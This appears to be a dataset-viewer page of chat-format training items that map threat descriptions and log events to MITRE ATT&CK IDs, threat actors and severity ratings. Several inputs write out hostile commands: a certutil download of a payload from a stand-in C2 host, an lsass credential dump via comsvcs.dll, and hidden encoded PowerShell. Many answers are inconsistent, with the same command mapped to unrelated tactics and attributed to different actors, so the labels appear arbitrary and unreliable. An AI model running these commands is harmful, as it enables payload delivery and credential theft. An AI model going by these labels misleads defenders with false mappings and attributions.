messages listlengths 2 2 |
|---|
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Command_Update_Server: This command passes the string “Gh0st Update” to the malware sample before running the sample again. When the sample restarts, it detects the “Gh0st Update” command line arg, and connects to the se... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: VaporRage can use HTTP to download shellcode from compromised websites.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}",
"role": "assistant"
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Bazar can enumerate the victim's desktop.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).",
"role": "user"
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.76.134.178",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA001... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 980 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.104.196.103",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.158.227.128",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-ZKSOH0JXGI)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Initial Access, Persistence",
"role": "user"
},
{
"cont... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.16.37.24",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0007\"], \"techniques\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-9UOEACU1HS)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3212 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.40.251.208",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1484... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: This activity may be used to collect or relay authentication materials.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1557.001\", \"T1557\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: USBStealer searches victim drives for files matching certain extensions (\".skr\",\".pkr\" or \".key\") or names.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1768 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confid... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for newly executed processes that may gather the system time and/or time zone from a local or remote system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1124\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-HVVFIRXWE4)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"Critica... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-67EMAOI3IN)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Critical\", \"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-NZ17HT07X7)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Privilege Escalation",
"role": "user"
},
{
"cont... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-C3B5WRVF5A)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Command and Control, Discovery",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-1UVR3IR4EF)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control, Initial Access, Exfiltration",
"role": "user"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.99.241.147",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techni... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for changes to binaries and service executables that may normally occur during software updates.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PowerShower is a backdoor written in PowerShell.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.001\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for executed commands and arguments that may attempt to find local system groups and permission settings.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069.001... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.22.208.214",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", ... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for API calls that may create or modify Windows services (ex: CreateServiceW()) to repeatedly execute malicious payloads as part of persistence.",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3400 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.6.82.166",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0003\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-AFHTGXO9IJ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Exfiltration, Impact",
"role": "user"
},
{
"content"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"conf... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.172.151.92",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0009\", \"TA0004... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-CT5GB4E2VZ)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Discovery, Collection, Privilege Escalation",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3873 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.104.19.17",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techn... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.168.186.116",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0001\", \"TA0007\"]... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.30.96.137",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0007\"]... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.51.106.149",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"tech... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired (Acquire Infrastructure) or previously compromised (Compromise Infrastructure).",
"role": "user"
},
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\":... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.00... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may abuse mmc.exe to proxy execution of malicious .msc files.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.014\"]}",
"role": "assistant"
}
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SpeakUp encodes its second-stage payload with Base64.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: menuPass has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: xCaon has encrypted data sent to the C2 server using a XOR key.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-VP96NOM92T)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"confidenc... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: LaZagne can obtain credential information from /etc/shadow using the shadow.py module.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.008\"]}",
"role": "assistant"
}
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 858 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-KGUFAVODTQ)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Collection, Discovery, Command and Control",
"role": "user... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Dragonfly has created a directory named \"out\" in the user's %AppData% folder and copied files to it.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \"T1074... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3752 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: environmental keying",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1480\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the res... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2247 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1098.004\", \"T1098\"]}",
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: China Chopper's server component can spider authentication portals.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1046\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: SHOTPUT has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1018\"]}... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-KZP7ORTI0T)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-6793031GOV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Collection, Exfiltration",
"role": "user"
},
{
"content... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.92.84.3",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3427 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.112.65.39",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1071.... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor the Registry for changes to the LSA Registry keys.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.002\", \"T1547\"]}",
"role": "assistant"
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.172.236.57",
"role": "user"
},
{
"content": "{\"tactics\": [\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-IMRWK97RFV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Reconnaissance, Command and Control",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-U7BV7TCL97)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Defense Evasion, Initial Access",
"role": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1534 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-98RABWFYHF)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Credential Access, Exfiltration, Command and Control",
"role": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-3H3RMVV4OD)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"Ext... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-DEIA8Y4BLH)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-U8P1VBC6IR)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration, Persistence",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1056 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"con... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2883 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.92.147.171",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0005... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2672 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.160.170.132",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0040\", \"TA0007\"],... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Additionally, a Turla custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"tech... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: NanoCore can capture audio feeds from the system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1123\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-9741QXDWFC)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Reconnaissance, Command and Control, Defense Evasion",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.001\", \"T105... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-BSJT65KBGU)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence, Defense Evasion, Impact",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.32.8.210",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0008\"], \"techniques\": [\"T1... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1179 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-2PCGF6UX2E)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access, Lateral Movement, Execution",
"role": "user"
},
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-EKZ0Z72Z1D)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Lateral Movement, Collection",
"role": "user"
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Leviathan has obfuscated code using base64 and gzip compression.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-S26YF5SUQR)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-QF0252AEAV)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution, Exfiltration, Collection",
"role": "user"
},
{
"cont... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: RainyDay can use RC4 to encrypt C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.